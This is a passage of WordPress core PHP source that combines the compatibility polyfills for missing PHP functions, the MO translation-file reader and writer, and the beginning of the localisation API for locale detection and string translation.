/** * WordPress implementation for PHP functions either missing from older PHP versions or not included by default. * * @package PHP * @access private */ // If gettext isn't available if ( ! function_exists( '_' ) ) { function _( $string ) { return $string; } } /** * Returns whether PCRE/u (PCRE_UTF8 modifier) is available for use. * * @ignore * @since 4.2.2 * @access private * * @staticvar string $utf8_pcre * * @param bool $set - Used for testing only * null : default - get PCRE/u capability * false : Used for testing - return false for future calls to this function * 'reset': Used for testing - restore default behavior of this function */ function _wp_can_use_pcre_u( $set = null ) { static $utf8_pcre = 'reset'; if ( null !== $set ) { $utf8_pcre = $set; } if ( 'reset' === $utf8_pcre ) { $utf8_pcre = @preg_match( '/^./u', 'a' ); } return $utf8_pcre; } if ( ! function_exists( 'mb_substr' ) ) : /** * Compat function to mimic mb_substr(). * * @ignore * @since 3.2.0 * * @see _mb_substr() * * @param string $str The string to extract the substring from. * @param int $start Position to being extraction from in `$str`. * @param int|null $length Optional. Maximum number of characters to extract from `$str`. * Default null. * @param string|null $encoding Optional. Character encoding to use. Default null. * @return string Extracted substring. */ function mb_substr( $str, $start, $length = null, $encoding = null ) { return _mb_substr( $str, $start, $length, $encoding ); } endif; /** * Internal compat function to mimic mb_substr(). * * Only understands UTF-8 and 8bit. All other character sets will be treated as 8bit. * For $encoding === UTF-8, the $str input is expected to be a valid UTF-8 byte sequence. * The behavior of this function for invalid inputs is undefined. * * @ignore * @since 3.2.0 * * @param string $str The string to extract the substring from. * @param int $start Position to being extraction from in `$str`. * @param int|null $length Optional. Maximum number of characters to extract from `$str`. * Default null. * @param string|null $encoding Optional. Character encoding to use. Default null. * @return string Extracted substring. */ function _mb_substr( $str, $start, $length = null, $encoding = null ) { if ( null === $encoding ) { $encoding = get_option( 'blog_charset' ); } /* * The solution below works only for UTF-8, so in case of a different * charset just use built-in substr(). */ if ( ! in_array( $encoding, array( 'utf8', 'utf-8', 'UTF8', 'UTF-8' ) ) ) { return is_null( $length ) ? substr( $str, $start ) : substr( $str, $start, $length ); } if ( _wp_can_use_pcre_u() ) { // Use the regex unicode support to separate the UTF-8 characters into an array. preg_match_all( '/./us', $str, $match ); $chars = is_null( $length ) ? array_slice( $match[0], $start ) : array_slice( $match[0], $start, $length ); return implode( '', $chars ); } $regex = '/( [\x00-\x7F] # single-byte sequences 0xxxxxxx | [\xC2-\xDF][\x80-\xBF] # double-byte sequences 110xxxxx 10xxxxxx | \xE0[\xA0-\xBF][\x80-\xBF] # triple-byte sequences 1110xxxx 10xxxxxx * 2 | [\xE1-\xEC][\x80-\xBF]{2} | \xED[\x80-\x9F][\x80-\xBF] | [\xEE-\xEF][\x80-\xBF]{2} | \xF0[\x90-\xBF][\x80-\xBF]{2} # four-byte sequences 11110xxx 10xxxxxx * 3 | [\xF1-\xF3][\x80-\xBF]{3} | \xF4[\x80-\x8F][\x80-\xBF]{2} )/x'; // Start with 1 element instead of 0 since the first thing we do is pop. $chars = array( '' ); do { // We had some string left over from the last round, but we counted it in that last round. array_pop( $chars ); /* * Split by UTF-8 character, limit to 1000 characters (last array element will contain * the rest of the string). */ $pieces = preg_split( $regex, $str, 1000, PREG_SPLIT_DELIM_CAPTURE | PREG_SPLIT_NO_EMPTY ); $chars = array_merge( $chars, $pieces ); // If there's anything left over, repeat the loop. } while ( count( $pieces ) > 1 && $str = array_pop( $pieces ) ); return join( '', array_slice( $chars, $start, $length ) ); } if ( ! function_exists( 'mb_strlen' ) ) : /** * Compat function to mimic mb_strlen(). * * @ignore * @since 4.2.0 * * @see _mb_strlen() * * @param string $str The string to retrieve the character length from. * @param string|null $encoding Optional. Character encoding to use. Default null. * @return int String length of `$str`. */ function mb_strlen( $str, $encoding = null ) { return _mb_strlen( $str, $encoding ); } endif; /** * Internal compat function to mimic mb_strlen(). * * Only understands UTF-8 and 8bit. All other character sets will be treated as 8bit. * For $encoding === UTF-8, the `$str` input is expected to be a valid UTF-8 byte * sequence. The behavior of this function for invalid inputs is undefined. * * @ignore * @since 4.2.0 * * @param string $str The string to retrieve the character length from. * @param string|null $encoding Optional. Character encoding to use. Default null. * @return int String length of `$str`. */ function _mb_strlen( $str, $encoding = null ) { if ( null === $encoding ) { $encoding = get_option( 'blog_charset' ); } /* * The solution below works only for UTF-8, so in case of a different charset * just use built-in strlen(). */ if ( ! in_array( $encoding, array( 'utf8', 'utf-8', 'UTF8', 'UTF-8' ) ) ) { return strlen( $str ); } if ( _wp_can_use_pcre_u() ) { // Use the regex unicode support to separate the UTF-8 characters into an array. preg_match_all( '/./us', $str, $match ); return count( $match[0] ); } $regex = '/(?: [\x00-\x7F] # single-byte sequences 0xxxxxxx | [\xC2-\xDF][\x80-\xBF] # double-byte sequences 110xxxxx 10xxxxxx | \xE0[\xA0-\xBF][\x80-\xBF] # triple-byte sequences 1110xxxx 10xxxxxx * 2 | [\xE1-\xEC][\x80-\xBF]{2} | \xED[\x80-\x9F][\x80-\xBF] | [\xEE-\xEF][\x80-\xBF]{2} | \xF0[\x90-\xBF][\x80-\xBF]{2} # four-byte sequences 11110xxx 10xxxxxx * 3 | [\xF1-\xF3][\x80-\xBF]{3} | \xF4[\x80-\x8F][\x80-\xBF]{2} )/x'; // Start at 1 instead of 0 since the first thing we do is decrement. $count = 1; do { // We had some string left over from the last round, but we counted it in that last round. $count--; /* * Split by UTF-8 character, limit to 1000 characters (last array element will contain * the rest of the string). */ $pieces = preg_split( $regex, $str, 1000 ); // Increment. $count += count( $pieces ); // If there's anything left over, repeat the loop. } while ( $str = array_pop( $pieces ) ); // Fencepost: preg_split() always returns one extra item in the array. return --$count; } if ( ! function_exists( 'hash_hmac' ) ) : /** * Compat function to mimic hash_hmac(). * * @ignore * @since 3.2.0 * * @see _hash_hmac() * * @param string $algo Hash algorithm. Accepts 'md5' or 'sha1'. * @param string $data Data to be hashed. * @param string $key Secret key to use for generating the hash. * @param bool $raw_output Optional. Whether to output raw binary data (true), * or lowercase hexits (false). Default false. * @return string|false The hash in output determined by `$raw_output`. False if `$algo` * is unknown or invalid. */ function hash_hmac( $algo, $data, $key, $raw_output = false ) { return _hash_hmac( $algo, $data, $key, $raw_output ); } endif; /** * Internal compat function to mimic hash_hmac(). * * @ignore * @since 3.2.0 * * @param string $algo Hash algorithm. Accepts 'md5' or 'sha1'. * @param string $data Data to be hashed. * @param string $key Secret key to use for generating the hash. * @param bool $raw_output Optional. Whether to output raw binary data (true), * or lowercase hexits (false). Default false. * @return string|false The hash in output determined by `$raw_output`. False if `$algo` * is unknown or invalid. */ function _hash_hmac( $algo, $data, $key, $raw_output = false ) { $packs = array( 'md5' => 'H32', 'sha1' => 'H40', ); if ( ! isset( $packs[ $algo ] ) ) { return false; } $pack = $packs[ $algo ]; if ( strlen( $key ) > 64 ) { $key = pack( $pack, $algo( $key ) ); } $key = str_pad( $key, 64, chr( 0 ) ); $ipad = ( substr( $key, 0, 64 ) ^ str_repeat( chr( 0x36 ), 64 ) ); $opad = ( substr( $key, 0, 64 ) ^ str_repeat( chr( 0x5C ), 64 ) ); $hmac = $algo( $opad . pack( $pack, $algo( $ipad . $data ) ) ); if ( $raw_output ) { return pack( $pack, $hmac ); } return $hmac; } if ( ! function_exists( 'json_encode' ) ) { function json_encode( $string ) { global $wp_json; if ( ! ( $wp_json instanceof Services_JSON ) ) { require_once( ABSPATH . WPINC . '/class-json.php' ); $wp_json = new Services_JSON(); } return $wp_json->encodeUnsafe( $string ); } } if ( ! function_exists( 'json_decode' ) ) { /** * @global Services_JSON $wp_json * @param string $string * @param bool $assoc_array * @return object|array */ function json_decode( $string, $assoc_array = false ) { global $wp_json; if ( ! ( $wp_json instanceof Services_JSON ) ) { require_once( ABSPATH . WPINC . '/class-json.php' ); $wp_json = new Services_JSON(); } $res = $wp_json->decode( $string ); if ( $assoc_array ) { $res = _json_decode_object_helper( $res ); } return $res; } /** * @param object $data * @return array */ function _json_decode_object_helper( $data ) { if ( is_object( $data ) ) { $data = get_object_vars( $data ); } return is_array( $data ) ? array_map( __FUNCTION__, $data ) : $data; } } if ( ! function_exists( 'hash_equals' ) ) : /** * Timing attack safe string comparison * * Compares two strings using the same time whether they're equal or not. * * This function was added in PHP 5.6. * * Note: It can leak the length of a string when arguments of differing length are supplied. * * @since 3.9.2 * * @param string $a Expected string. * @param string $b Actual, user supplied, string. * @return bool Whether strings are equal. */ function hash_equals( $a, $b ) { $a_length = strlen( $a ); if ( $a_length !== strlen( $b ) ) { return false; } $result = 0; // Do not attempt to "optimize" this. for ( $i = 0; $i < $a_length; $i++ ) { $result |= ord( $a[ $i ] ) ^ ord( $b[ $i ] ); } return $result === 0; } endif; // JSON_PRETTY_PRINT was introduced in PHP 5.4 // Defined here to prevent a notice when using it with wp_json_encode() if ( ! defined( 'JSON_PRETTY_PRINT' ) ) { define( 'JSON_PRETTY_PRINT', 128 ); } if ( ! function_exists( 'json_last_error_msg' ) ) : /** * Retrieves the error string of the last json_encode() or json_decode() call. * * @since 4.4.0 * * @internal This is a compatibility function for PHP <5.5 * * @return bool|string Returns the error message on success, "No Error" if no error has occurred, * or false on failure. */ function json_last_error_msg() { // See https://core.trac.wordpress.org/ticket/27799. if ( ! function_exists( 'json_last_error' ) ) { return false; } $last_error_code = json_last_error(); // Just in case JSON_ERROR_NONE is not defined. $error_code_none = defined( 'JSON_ERROR_NONE' ) ? JSON_ERROR_NONE : 0; switch ( true ) { case $last_error_code === $error_code_none: return 'No error'; case defined( 'JSON_ERROR_DEPTH' ) && JSON_ERROR_DEPTH === $last_error_code: return 'Maximum stack depth exceeded'; case defined( 'JSON_ERROR_STATE_MISMATCH' ) && JSON_ERROR_STATE_MISMATCH === $last_error_code: return 'State mismatch (invalid or malformed JSON)'; case defined( 'JSON_ERROR_CTRL_CHAR' ) && JSON_ERROR_CTRL_CHAR === $last_error_code: return 'Control character error, possibly incorrectly encoded'; case defined( 'JSON_ERROR_SYNTAX' ) && JSON_ERROR_SYNTAX === $last_error_code: return 'Syntax error'; case defined( 'JSON_ERROR_UTF8' ) && JSON_ERROR_UTF8 === $last_error_code: return 'Malformed UTF-8 characters, possibly incorrectly encoded'; case defined( 'JSON_ERROR_RECURSION' ) && JSON_ERROR_RECURSION === $last_error_code: return 'Recursion detected'; case defined( 'JSON_ERROR_INF_OR_NAN' ) && JSON_ERROR_INF_OR_NAN === $last_error_code: return 'Inf and NaN cannot be JSON encoded'; case defined( 'JSON_ERROR_UNSUPPORTED_TYPE' ) && JSON_ERROR_UNSUPPORTED_TYPE === $last_error_code: return 'Type is not supported'; default: return 'An unknown error occurred'; } } endif; if ( ! interface_exists( 'JsonSerializable' ) ) { define( 'WP_JSON_SERIALIZE_COMPATIBLE', true ); /** * JsonSerializable interface. * * Compatibility shim for PHP <5.4 * * @link https://secure.php.net/jsonserializable * * @since 4.4.0 */ interface JsonSerializable { public function jsonSerialize(); } } // random_int was introduced in PHP 7.0 if ( ! function_exists( 'random_int' ) ) { require ABSPATH . WPINC . '/random_compat/random.php'; } // sodium_crypto_box was introduced in PHP 7.2 if ( ! function_exists( 'sodium_crypto_box' ) ) { require ABSPATH . WPINC . '/sodium_compat/autoload.php'; } if ( ! function_exists( 'array_replace_recursive' ) ) : /** * PHP-agnostic version of {@link array_replace_recursive()}. * * The array_replace_recursive() function is a PHP 5.3 function. WordPress * currently supports down to PHP 5.2, so this method is a workaround * for PHP 5.2. * * Note: array_replace_recursive() supports infinite arguments, but for our use- * case, we only need to support two arguments. * * Subject to removal once WordPress makes PHP 5.3.0 the minimum requirement. * * @since 4.5.3 * * @see https://secure.php.net/manual/en/function.array-replace-recursive.php#109390 * * @param array $base Array with keys needing to be replaced. * @param array $replacements Array with the replaced keys. * * @return array */ function array_replace_recursive( $base = array(), $replacements = array() ) { foreach ( array_slice( func_get_args(), 1 ) as $replacements ) { $bref_stack = array( &$base ); $head_stack = array( $replacements ); do { end( $bref_stack ); $bref = &$bref_stack[ key( $bref_stack ) ]; $head = array_pop( $head_stack ); unset( $bref_stack[ key( $bref_stack ) ] ); foreach ( array_keys( $head ) as $key ) { if ( isset( $key, $bref ) && isset( $bref[ $key ] ) && is_array( $bref[ $key ] ) && isset( $head[ $key ] ) && is_array( $head[ $key ] ) ) { $bref_stack[] = &$bref[ $key ]; $head_stack[] = $head[ $key ]; } else { $bref[ $key ] = $head[ $key ]; } } } while ( count( $head_stack ) ); } return $base; } endif; /** * Polyfill for the SPL autoloader. In PHP 5.2 (but not 5.3 and later), SPL can * be disabled, and PHP 7.2 raises notices if the compiler finds an __autoload() * function declaration. Function availability is checked here, and the * autoloader is included only if necessary. */ if ( ! function_exists( 'spl_autoload_register' ) ) { require_once ABSPATH . WPINC . '/spl-autoload-compat.php'; } if ( ! function_exists( 'is_countable' ) ) { /** * Polyfill for is_countable() function added in PHP 7.3. * * Verify that the content of a variable is an array or an object * implementing the Countable interface. * * @since 4.9.6 * * @param mixed $var The value to check. * * @return bool True if `$var` is countable, false otherwise. */ function is_countable( $var ) { return ( is_array( $var ) || $var instanceof Countable || $var instanceof SimpleXMLElement || $var instanceof ResourceBundle ); } } if ( ! function_exists( 'is_iterable' ) ) { /** * Polyfill for is_iterable() function added in PHP 7.1. * * Verify that the content of a variable is an array or an object * implementing the Traversable interface. * * @since 4.9.6 * * @param mixed $var The value to check. * * @return bool True if `$var` is iterable, false otherwise. */ function is_iterable( $var ) { return ( is_array( $var ) || $var instanceof Traversable ); } } if ( ! function_exists( 'str_starts_with' ) ) { /** * Polyfill for `str_starts_with()` function added in PHP 8.0. * * Performs a case-sensitive check indicating if * the haystack begins with needle. * * @since 5.9.0 * * @param string $haystack The string to search in. * @param string $needle The substring to search for in the `$haystack`. * @return bool True if `$haystack` starts with `$needle`, otherwise false. */ function str_starts_with( $haystack, $needle ) { if ( '' === $needle ) { return true; } return 0 === strpos( $haystack, $needle ); } } if ( ! function_exists( 'str_ends_with' ) ) { /** * Polyfill for `str_ends_with()` function added in PHP 8.0. * * Performs a case-sensitive check indicating if * the haystack ends with needle. * * @since 5.9.0 * * @param string $haystack The string to search in. * @param string $needle The substring to search for in the `$haystack`. * @return bool True if `$haystack` ends with `$needle`, otherwise false. */ function str_ends_with( $haystack, $needle ) { if ( '' === $haystack ) { return '' === $needle; } $len = strlen( $needle ); return substr( $haystack, -$len, $len ) === $needle; } } /** * Class for working with MO files * * @version $Id: mo.php 1157 2015-11-20 04:30:11Z dd32 $ * @package pomo * @subpackage mo */ require_once dirname( __FILE__ ) . '/translations.php'; require_once dirname( __FILE__ ) . '/streams.php'; if ( ! class_exists( 'MO', false ) ) : class MO extends Gettext_Translations { var $_nplurals = 2; /** * Loaded MO file. * * @var string */ private $filename = ''; /** * Returns the loaded MO file. * * @return string The loaded MO file. */ public function get_filename() { return $this->filename; } /** * Fills up with the entries from MO file $filename * * @param string $filename MO file to load * @return bool True if the import from file was successful, otherwise false. */ function import_from_file( $filename ) { $reader = new POMO_FileReader( $filename ); if ( ! $reader->is_resource() ) { return false; } $this->filename = (string) $filename; return $this->import_from_reader( $reader ); } /** * @param string $filename * @return bool */ function export_to_file( $filename ) { $fh = fopen( $filename, 'wb' ); if ( ! $fh ) { return false; } $res = $this->export_to_file_handle( $fh ); fclose( $fh ); return $res; } /** * @return string|false */ function export() { $tmp_fh = fopen( 'php://temp', 'r+' ); if ( ! $tmp_fh ) { return false; } $this->export_to_file_handle( $tmp_fh ); rewind( $tmp_fh ); return stream_get_contents( $tmp_fh ); } /** * @param Translation_Entry $entry * @return bool */ function is_entry_good_for_export( $entry ) { if ( empty( $entry->translations ) ) { return false; } if ( ! array_filter( $entry->translations ) ) { return false; } return true; } /** * @param resource $fh * @return true */ function export_to_file_handle( $fh ) { $entries = array_filter( $this->entries, array( $this, 'is_entry_good_for_export' ) ); ksort( $entries ); $magic = 0x950412de; $revision = 0; $total = count( $entries ) + 1; // all the headers are one entry $originals_lenghts_addr = 28; $translations_lenghts_addr = $originals_lenghts_addr + 8 * $total; $size_of_hash = 0; $hash_addr = $translations_lenghts_addr + 8 * $total; $current_addr = $hash_addr; fwrite( $fh, pack( 'V*', $magic, $revision, $total, $originals_lenghts_addr, $translations_lenghts_addr, $size_of_hash, $hash_addr ) ); fseek( $fh, $originals_lenghts_addr ); // headers' msgid is an empty string fwrite( $fh, pack( 'VV', 0, $current_addr ) ); $current_addr++; $originals_table = "\0"; $reader = new POMO_Reader(); foreach ( $entries as $entry ) { $originals_table .= $this->export_original( $entry ) . "\0"; $length = $reader->strlen( $this->export_original( $entry ) ); fwrite( $fh, pack( 'VV', $length, $current_addr ) ); $current_addr += $length + 1; // account for the NULL byte after } $exported_headers = $this->export_headers(); fwrite( $fh, pack( 'VV', $reader->strlen( $exported_headers ), $current_addr ) ); $current_addr += strlen( $exported_headers ) + 1; $translations_table = $exported_headers . "\0"; foreach ( $entries as $entry ) { $translations_table .= $this->export_translations( $entry ) . "\0"; $length = $reader->strlen( $this->export_translations( $entry ) ); fwrite( $fh, pack( 'VV', $length, $current_addr ) ); $current_addr += $length + 1; } fwrite( $fh, $originals_table ); fwrite( $fh, $translations_table ); return true; } /** * @param Translation_Entry $entry * @return string */ function export_original( $entry ) { //TODO: warnings for control characters $exported = $entry->singular; if ( $entry->is_plural ) { $exported .= "\0" . $entry->plural; } if ( $entry->context ) { $exported = $entry->context . "\4" . $exported; } return $exported; } /** * @param Translation_Entry $entry * @return string */ function export_translations( $entry ) { //TODO: warnings for control characters return $entry->is_plural ? implode( "\0", $entry->translations ) : $entry->translations[0]; } /** * @return string */ function export_headers() { $exported = ''; foreach ( $this->headers as $header => $value ) { $exported .= "$header: $value\n"; } return $exported; } /** * @param int $magic * @return string|false */ function get_byteorder( $magic ) { // The magic is 0x950412de // bug in PHP 5.0.2, see https://savannah.nongnu.org/bugs/?func=detailitem&item_id=10565 $magic_little = (int) - 1794895138; $magic_little_64 = (int) 2500072158; // 0xde120495 $magic_big = ( (int) - 569244523 ) & 0xFFFFFFFF; if ( $magic_little == $magic || $magic_little_64 == $magic ) { return 'little'; } elseif ( $magic_big == $magic ) { return 'big'; } else { return false; } } /** * @param POMO_FileReader $reader * @return bool True if the import was successful, otherwise false. */ function import_from_reader( $reader ) { $endian_string = MO::get_byteorder( $reader->readint32() ); if ( false === $endian_string ) { return false; } $reader->setEndian( $endian_string ); $endian = ( 'big' == $endian_string ) ? 'N' : 'V'; $header = $reader->read( 24 ); if ( $reader->strlen( $header ) != 24 ) { return false; } // parse header $header = unpack( "{$endian}revision/{$endian}total/{$endian}originals_lenghts_addr/{$endian}translations_lenghts_addr/{$endian}hash_length/{$endian}hash_addr", $header ); if ( ! is_array( $header ) ) { return false; } // support revision 0 of MO format specs, only if ( $header['revision'] != 0 ) { return false; } // seek to data blocks $reader->seekto( $header['originals_lenghts_addr'] ); // read originals' indices $originals_lengths_length = $header['translations_lenghts_addr'] - $header['originals_lenghts_addr']; if ( $originals_lengths_length != $header['total'] * 8 ) { return false; } $originals = $reader->read( $originals_lengths_length ); if ( $reader->strlen( $originals ) != $originals_lengths_length ) { return false; } // read translations' indices $translations_lenghts_length = $header['hash_addr'] - $header['translations_lenghts_addr']; if ( $translations_lenghts_length != $header['total'] * 8 ) { return false; } $translations = $reader->read( $translations_lenghts_length ); if ( $reader->strlen( $translations ) != $translations_lenghts_length ) { return false; } // transform raw data into set of indices $originals = $reader->str_split( $originals, 8 ); $translations = $reader->str_split( $translations, 8 ); // skip hash table $strings_addr = $header['hash_addr'] + $header['hash_length'] * 4; $reader->seekto( $strings_addr ); $strings = $reader->read_all(); $reader->close(); for ( $i = 0; $i < $header['total']; $i++ ) { $o = unpack( "{$endian}length/{$endian}pos", $originals[ $i ] ); $t = unpack( "{$endian}length/{$endian}pos", $translations[ $i ] ); if ( ! $o || ! $t ) { return false; } // adjust offset due to reading strings to separate space before $o['pos'] -= $strings_addr; $t['pos'] -= $strings_addr; $original = $reader->substr( $strings, $o['pos'], $o['length'] ); $translation = $reader->substr( $strings, $t['pos'], $t['length'] ); if ( '' === $original ) { $this->set_headers( $this->make_headers( $translation ) ); } else { $entry = &$this->make_entry( $original, $translation ); $this->entries[ $entry->key() ] = &$entry; } } return true; } /** * Build a Translation_Entry from original string and translation strings, * found in a MO file * * @static * @param string $original original string to translate from MO file. Might contain * 0x04 as context separator or 0x00 as singular/plural separator * @param string $translation translation string from MO file. Might contain * 0x00 as a plural translations separator * @return Translation_Entry Entry instance. */ function &make_entry( $original, $translation ) { $entry = new Translation_Entry(); // Look for context, separated by \4. $parts = explode( "\4", $original ); if ( isset( $parts[1] ) ) { $original = $parts[1]; $entry->context = $parts[0]; } // look for plural original $parts = explode( "\0", $original ); $entry->singular = $parts[0]; if ( isset( $parts[1] ) ) { $entry->is_plural = true; $entry->plural = $parts[1]; } // plural translations are also separated by \0 $entry->translations = explode( "\0", $translation ); return $entry; } /** * @param int $count * @return string */ function select_plural_form( $count ) { return $this->gettext_select_plural_form( $count ); } /** * @return int */ function get_plural_forms_count() { return $this->_nplurals; } } endif; /** * Core Translation API * * @package WordPress * @subpackage i18n * @since 1.2.0 */ /** * Retrieves the current locale. * * If the locale is set, then it will filter the locale in the {@see 'locale'} * filter hook and return the value. * * If the locale is not set already, then the WPLANG constant is used if it is * defined. Then it is filtered through the {@see 'locale'} filter hook and * the value for the locale global set and the locale is returned. * * The process to get the locale should only be done once, but the locale will * always be filtered using the {@see 'locale'} hook. * * @since 1.5.0 * * @global string $locale * @global string $wp_local_package * * @return string The locale of the blog or from the {@see 'locale'} hook. */ function get_locale() { global $locale, $wp_local_package; if ( isset( $locale ) ) { /** * Filters the locale ID of the WordPress installation. * * @since 1.5.0 * * @param string $locale The locale ID. */ return apply_filters( 'locale', $locale ); } if ( isset( $wp_local_package ) ) { $locale = $wp_local_package; } // WPLANG was defined in wp-config. if ( defined( 'WPLANG' ) ) { $locale = WPLANG; } // If multisite, check options. if ( is_multisite() ) { // Don't check blog option when installing. if ( wp_installing() || ( false === $ms_locale = get_option( 'WPLANG' ) ) ) { $ms_locale = get_site_option( 'WPLANG' ); } if ( $ms_locale !== false ) { $locale = $ms_locale; } } else { $db_locale = get_option( 'WPLANG' ); if ( $db_locale !== false ) { $locale = $db_locale; } } if ( empty( $locale ) ) { $locale = 'en_US'; } /** This filter is documented in wp-includes/l10n.php */ return apply_filters( 'locale', $locale ); } /** * Retrieves the locale of a user. * * If the user has a locale set to a non-empty string then it will be * returned. Otherwise it returns the locale of get_locale(). * * @since 4.7.0 * * @param int|WP_User $user_id User's ID or a WP_User object. Defaults to current user. * @return string The locale of the user. */ function get_user_locale( $user_id = 0 ) { $user = false; if ( 0 === $user_id && function_exists( 'wp_get_current_user' ) ) { $user = wp_get_current_user(); } elseif ( $user_id instanceof WP_User ) { $user = $user_id; } elseif ( $user_id && is_numeric( $user_id ) ) { $user = get_user_by( 'id', $user_id ); } if ( ! $user ) { return get_locale(); } $locale = $user->locale; return $locale ? $locale : get_locale(); } /** * Determine the current locale desired for the request. * * @since 5.0.0 * * @global string $pagenow * * @return string The determined locale. */ function determine_locale() { /** * Filters the locale for the current request prior to the default determination process. * * Using this filter allows to override the default logic, effectively short-circuiting the function. * * @since 5.0.0 * * @param string|null The locale to return and short-circuit, or null as default. */ $determined_locale = apply_filters( 'pre_determine_locale', null ); if ( ! empty( $determined_locale ) && is_string( $determined_locale ) ) { return $determined_locale; } $determined_locale = get_locale(); if ( is_admin() ) { $determined_locale = get_user_locale(); } if ( isset( $_GET['_locale'] ) && 'user' === $_GET['_locale'] && wp_is_json_request() ) { $determined_locale = get_user_locale(); } if ( ! empty( $_GET['wp_lang'] ) && ! empty( $GLOBALS['pagenow'] ) && 'wp-login.php' === $GLOBALS['pagenow'] ) { $determined_locale = sanitize_locale_name( wp_unslash( $_GET['wp_lang'] ) ); } /** * Filters the locale for the current request. * * @since 5.0.0 * * @param string $locale The locale. */ return apply_filters( 'determine_locale', $determined_locale ); } /** * Retrieve the translation of $text. * * If there is no translation, or the text domain isn't loaded, the original text is returned. * * *Note:* Don't use translate() directly, use __() or related functions. * * @since 2.2.0 * * @param string $text Text to translate. * @param string $domain Optional. Text domain. Unique identifier for retrieving translated strings. * Default 'default'. * @return string Translated text */ function translate( $text, $domain = 'default' ) { $translations = get_translations_for_domain( $domain ); $translation = $translations->translate( $text ); /** * Filters text with its translation. * * @since 2.0.11 * * @param string $translation Translated text. * @param string $text Text to translate. * @param string $domain Text domain. Unique identifier for retrieving translated strings. */ return apply_filters( 'gettext', $translation, $text, $domain ); } /** * Remove last item on a pipe-delimited string. * * Meant for removing the last item in a string, such as 'Role name|User role'. The original * string will be returned if no pipe '|' characters are found in the string. * * @since 2.8.0 * * @param string $string A pipe-delimited string. * @return string Either $string or everything before the last pipe. */ function before_last_bar( $string ) { $last_bar = strrpos( $string, '|' ); if ( false === $last_bar ) { return $string; } else { return substr( $string, 0, $last_bar ); } } /** * Retrieve the translation of $text in the context defined in $context. * * If there is no translation, or the text domain isn't loaded the original * text is returned. * * *Note:* Don't use translate_with_gettext_context() directly, use _x() or related functions. * * @since 2.8.0 * * @param string $text Text to translate. * @param string $context Context information for the translators. * @param string $domain Optional. Text domain. Unique identifier for retrieving translated strings. * Default 'default'. * @return string Translated text on success, original text on failure. */ function translate_with_gettext_context( $text, $context, $domain = 'default' ) { $translations = get_translations_for_domain( $domain ); $translation = $translations->translate( $text, $context ); /** * Filters text with its translation based on context information. * * @since 2.8.0 * * @param string $translation Translated text. * @param string $text Text to translate. * @param string $context Context information for the translators. * @param string $domain Text domain. Unique identifier for retrieving translated strings. */ return apply_filters( 'gettext_with_context', $translation, $text, $context, $domain ); } /** * Retrieve the translation of $text. * * If there is no translation, or the text domain isn't loaded, the original text is returned. * * @since 2.1.0 * * @param string $text Text to translate. * @param string $domain Optional. Text domain. Unique identifier for retrieving translated strings. * Default 'default'. * @return string Translated text. */ function __( $text, $domain = 'default' ) { return translate( $text, $domain ); } /** * Retrieve the translation of $text and escapes it for safe use in an attribute. * * If there is no translation, or the text domain isn't loaded, the original text is returned. * * @since 2.8.0 * * @param string $text Text to translate. * @param string $domain Optional. Text domain. Unique identifier for retrieving translated strings. * Default 'default'. * @return string Translated text on success, original text on failure. */ function esc_attr__( $text, $domain = 'default' ) { return esc_attr( translate( $text, $domain ) ); } /** * Retrieve the translation of $text and escapes it for safe use in HTML output. * * If there is no translation, or the text domain isn't loaded, the original text * is escaped and returned. * * @since 2.8.0 * * @param string $text Text to translate. * @param string $domain Optional. Text domain. Unique identifier for retrieving translated strings. * Default 'default'. * @return string Translated text */ function esc_html__( $text, $domain = 'default' ) { return esc_html( translate( $text, $domain ) ); } /** * Display translated text. * * @since 1.2.0 * * @param string $text Text to translate. * @param string $domain Optional. Text domain. Unique identifier for retrieving translated strings. * Default 'default'. */ function _e( $text, $domain = 'default' ) { echo translate( $text, $domain ); } /** * Display translated text that has been escaped for safe use in an attribute. * * @since 2.8.0 * * @param string $text Text to translate. * @param string $domain Optional. Text domain. Unique identifier for retrieving translated strings. * Default 'default'. */ function esc_attr_e( $text, $domain = 'default' ) { echo esc_attr( translate( $text, $domain ) ); } /** * Display translated text that has been escaped for safe use in HTML output. * * @since 2.8.0 * * @param string $text Text to translate. * @param string $domain Optional. Text domain. Unique identifier for retrieving translated strings. * Default 'default'. */ function esc_html_e( $text, $domain = 'default' ) { echo esc_html( translate( $text, $domain ) ); } /** * Retrieve translated string with gettext context. * * Quite a few times, there will be collisions with similar translatable text * found in more than two places, but with different translated context. * * By including the context in the pot file, translators can translate the two * strings differently. * * @since 2.8.0 * * @param string $text Text to translate. * @param string $context Context information for the translators. * @param string $domain Optional. Text domain. Unique identifier for retrieving translated strings. * Default 'default'. * @return string Translated context string without pipe. */ function _x( $text, $context, $domain = 'default' ) { return translate_with_gettext_context( $text, $context, $domain ); } /** * Display translated string with gettext context. * * @since 3.0.0 * * @param string $text Text to translate. * @param string $context Context information for the translators. * @param string $domain Optional. Text domain. Unique identifier for retrieving translated strings. * Default 'default'. * @return string Translated context string without pipe. */ function _ex( $text, $context, $domain = 'default' ) { echo _x( $text, $context, $domain ); } /** * Translate string with gettext context, and escapes it for safe use in an attribute. * * @since 2.8.0 * * @param string $text Text to translate. * @param string $context Context information for the translators. * @param string $domain Optional. Text domain. Unique identifier for retrieving translated strings. * Default 'default'. * @return string Translated text */ function esc_attr_x( $text, $context, $domain = 'default' ) { return esc_attr( translate_with_gettext_context( $text, $context, $domain ) ); } /** * Translate string with gettext context, and escapes it for safe use in HTML output. * * @since 2.9.0 * * @param string $text Text to translate. * @param string $context Context information for the translators. * @param string $domain Optional. Text domain. Unique identifier for retrieving translated strings. * Default 'default'. * @return string Translated text. */ function esc_html_x( $text, $context, $domain = 'default' ) { return esc_html( translate_with_gettext_context( $text, $context, $domain ) ); } /** * Translates and retrieves the singular or plural form based on the supplied number. * * Used when you want to use the appropriate form of a string based on whether a * number is singular or plural. * * Example: * * printf( _n( '%s person', '%s people', $count, 'text-domain' ), number_format_i18n( $count ) ); * * @since 2.8.0 * * @param string $single The text to be used if the number is singular. * @param string $plural The text to be used if the number is plural. * @param int $number The number to compare against to use either the singular or plural form. * @param string $domain Optional. Text domain. Unique identifier for retrieving translated strings. * Default 'default'. * @return string The translated singular or plural form. */ function _n( $single, $plural, $number, $domain = 'default' ) { $translations = get_translations_for_domain( $domain ); $translation = $translations->translate_plural( $single, $plural, $number ); /** * Filters the singular or plural form of a string. * * @since 2.2.0 * * @param string $translation Translated text. * @param string $single The text to be used if the number is singular. * @param string $plural The text to be used if the number is plural. * @param string $number The number to compare against to use either the singular or plural form. * @param string $domain Text domain. Unique identifier for retrieving translated strings. */ return apply_filters( 'ngettext', $translation, $single, $plural, $number, $domain ); } /** * Translates and retrieves the singular or plural form based on the supplied number, with gettext context. * * This is a 